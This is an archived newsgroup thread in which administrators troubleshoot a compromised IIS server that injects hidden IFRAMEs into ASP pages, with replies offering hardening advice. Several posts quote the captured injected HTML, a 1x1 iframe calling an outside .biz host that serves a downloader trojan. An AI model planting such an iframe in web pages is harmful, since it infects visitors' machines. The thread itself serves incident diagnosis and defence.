| Groups | Blog | Home |
iis security : Virus in IFRAME injected into our ASP pages (downloader trojan on client)
Antivirus (Symantec Corporate) when run on the server doesn't detect it. It is a Windows Server 2003 Standard server, running SP1 and all the latest patches. IIS sends down a website to the user with IFRAMEs injected into the HTML: <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 [quoted text, click to view] ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php width=1 height=1></iframe></TD></A></TR></TABLE></TD> The iframe code above pointing to xaqjlyswly.biz does not come from our code. I looked at the ASP function that generates this link and there is nothing there that would put that on the page. The iframe tries to get the user's browser to download the Downloader virus which, according to Symantec "connects to the Internet and downloads other Trojan horses" http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99 My local antivirus on my machine caught downloader getting installed after browsing the site on the infected server. I used Agent Ransack to look for the string ".biz" across all our websites source code. The string wasn't found anywhere. That all leads me to believe that something is getting injected into the code before it is sent to the end user. I found an older virus that has similar characteristics called Download.Ject which infected IIS also. I followed Microsoft's suggestions for detecting Download.Ject and we don't have it.
Hi Paul,
I believe the current situation indicates your web server got hacked/attacked. For suck kind of urgent cases of Virus/Trojan, I would like to suggest that you contact Microsoft Customer Service and Support services as well as some third-party security and anti-virus services vendor like Symantec for assistance. You can call our support center via telephone so that a dedicated Support Professional can assist with this request. To obtain the phone numbers for specific technology request please take a look at the web site listed below. http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHONENUMBERS If you are outside the US please see http://support.microsoft.com for regional support phone numbers. Thanks. Sincerely, WenJun Zhang Microsoft Online Community Support ================================================== Get notification to my posts through email? Please refer to: http://msdn.microsoft.com/subscriptions/managednewsgroups/default.aspx#notif ications. Note: The MSDN Managed Newsgroup support offering is for non-urgent issues where an initial response from the community or a Microsoft Support Engineer within 1 business day is acceptable. Please note that each follow up response may take approximately 2 business days as the support professional working with you may need further investigation to reach the most efficient resolution. The offering is not appropriate for situations that require urgent, real-time or phone-based interactions or complex project analysis and dump analysis issues. Issues of this nature are best handled working with a dedicated Microsoft Support Engineer by contacting Microsoft Customer Support Services (CSS) at: http://msdn.microsoft.com/subscriptions/support/default.aspx. ================================================== This posting is provided "AS IS" with no warranties, and confers no rights.
We had the same problem on our windows 2003 server today.
We cannot find any information anywhere. Any ideas??? Paul Oliver a =E9crit : [quoted text, click to view] > Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > It is a Windows Server 2003 Standard server, running SP1 and all the > latest patches. IIS sends down a website to the user with IFRAMEs > injected into the HTML: > > <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG > NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0 > ></A></TD><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self > CLASS=3D"ltblue"></a><iframe src=3Dhttp://xaqjlyswly.biz/dl/adv448.php > width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD> > > The iframe code above pointing to xaqjlyswly.biz does not come from our > code. I looked at the ASP function that generates this link and there > is nothing there that would put that on the page. > > The iframe tries to get the user's browser to download the Downloader > virus which, according to Symantec "connects to the Internet and > downloads other Trojan horses" > > http://www.symantec.com/security_response/writeup.jsp?docid=3D2002-101518= -4323-99 > > My local antivirus on my machine caught downloader getting installed > after browsing the site on the infected server. > > I used Agent Ransack to look for the string ".biz" across all our > websites source code. The string wasn't found anywhere. > > That all leads me to believe that something is getting injected into the > code before it is sent to the end user. > > I found an older virus that has similar characteristics called > Download.Ject which infected IIS also. I followed Microsoft's > suggestions for detecting Download.Ject and we don't have it. >=20 > Any ideas?
In article <uelbG$kGHHA.924@TK2MSFTNGP02.phx.gbl>,
PaulOliver@noemail.noemail says... [quoted text, click to view] > Our website was compromised sometime in the last few days, but our > Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > It is a Windows Server 2003 Standard server, running SP1 and all the > latest patches. IIS sends down a website to the user with IFRAMEs > injected into the HTML: > > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php > width=1 height=1></iframe></TD></A></TR></TABLE></TD> > > The iframe code above pointing to xaqjlyswly.biz does not come from our > code. I looked at the ASP function that generates this link and there > is nothing there that would put that on the page. The reason that Symantec didn't detect it on the server is because the threat (malware) is not on your server, it's on the remote server. [quoted text, click to view] > The iframe tries to get the user's browser to download the Downloader > virus which, according to Symantec "connects to the Internet and > downloads other Trojan horses" > > http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99 > > My local antivirus on my machine caught downloader getting installed > after browsing the site on the infected server. > > I used Agent Ransack to look for the string ".biz" across all our > websites source code. The string wasn't found anywhere. > > That all leads me to believe that something is getting injected into the > code before it is sent to the end user. > > I found an older virus that has similar characteristics called > Download.Ject which infected IIS also. I followed Microsoft's > suggestions for detecting Download.Ject and we don't have it. > > Any ideas? Put a real firewall in front of your server, block all foreign subnets not required, rename the administrator account and disable all accounts not needed, patch the server, etc... Follow ALL of the recommendations that secure your server. What services, other than HTTP did you expose? -- spam999free@rrohio.com
We had to reinstall IIS on the server and it did the trick.
By the way, we tried windows defender and windows removing tools, both didn't found anything. And after our tests, IIS was really compromise. Any website running asp or aspx pages inject the iframe code. The hack seems to have been at the core of IIS. ASAPI filter desactivation didn't do the trick. Any idea anyone what it was? Leythos a =E9crit : [quoted text, click to view] > In article <uelbG$kGHHA.924@TK2MSFTNGP02.phx.gbl>,
> PaulOliver@noemail.noemail says... > > Our website was compromised sometime in the last few days, but our > > Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > > > It is a Windows Server 2003 Standard server, running SP1 and all the > > latest patches. IIS sends down a website to the user with IFRAMEs > > injected into the HTML: > > > > <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG > > NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0 > > ></A></TD><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self > > CLASS=3D"ltblue"></a><iframe src=3Dhttp://xaqjlyswly.biz/dl/adv448.php > > width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD> > > > > The iframe code above pointing to xaqjlyswly.biz does not come from our > > code. I looked at the ASP function that generates this link and there > > is nothing there that would put that on the page. > > The reason that Symantec didn't detect it on the server is because the > threat (malware) is not on your server, it's on the remote server. > > > The iframe tries to get the user's browser to download the Downloader > > virus which, according to Symantec "connects to the Internet and > > downloads other Trojan horses" > > > > http://www.symantec.com/security_response/writeup.jsp?docid=3D2002-1015= 18-4323-99 > > > > My local antivirus on my machine caught downloader getting installed > > after browsing the site on the infected server. > > > > I used Agent Ransack to look for the string ".biz" across all our > > websites source code. The string wasn't found anywhere. > > > > That all leads me to believe that something is getting injected into the > > code before it is sent to the end user. > > > > I found an older virus that has similar characteristics called > > Download.Ject which infected IIS also. I followed Microsoft's > > suggestions for detecting Download.Ject and we don't have it. > > > > Any ideas? > > Put a real firewall in front of your server, block all foreign subnets > not required, rename the administrator account and disable all accounts > not needed, patch the server, etc... Follow ALL of the recommendations > that secure your server. > > What services, other than HTTP did you expose? >=20 > --=20 >=20 > spam999free@rrohio.com > remove 999 in order to email me
In article <1165843984.956869.252350@16g2000cwy.googlegroups.com>,
dcote@dgmdata.com says... [quoted text, click to view] > We had to reinstall IIS on the server and it did the trick. I don't think so, sure it got it working again, but, reinstalling IIS does not resolve the root cause. [quoted text, click to view] > By the way, we tried windows defender and windows removing tools, both > didn't found anything. And after our tests, IIS was really compromise. > Any website running asp or aspx pages inject the iframe code. The hack > seems to have been at the core of IIS. ASAPI filter desactivation > didn't do the trick. Windows Defender is worthless and unless you setup your server properly it will happen again. I've had hundreds of IIS based webservers online since the late days of NT4 and never had one compromised. You need to properly configured and properly firewall your server, and you need to properly code sites so that you don't expose your site to exploits in website code. [quoted text, click to view] > > Any idea anyone what it was? No, but you might be able to find information on google.com -- spam999free@rrohio.com
Don't see what you're looking for? Try a search.
|
June 2003
July 2003
August 2003
September 2003
October 2003
November 2003
December 2003
January 2004
February 2004
March 2004
April 2004
May 2004
June 2004
July 2004
August 2004
September 2004
October 2004
November 2004
December 2004
January 2005
February 2005
March 2005
April 2005
May 2005
June 2005
July 2005
August 2005
September 2005
October 2005
November 2005
December 2005
January 2006
February 2006
March 2006
April 2006
May 2006
June 2006
July 2006
August 2006
September 2006
October 2006
November 2006
December 2006
January 2007
February 2007
March 2007
April 2007
May 2007
June 2007
July 2007
August 2007
September 2007
October 2007
November 2007
December 2007
January 2008
February 2008
March 2008
April 2008
May 2008
June 2008
| home · blog · groups | Questions? Comments? Contact the dn |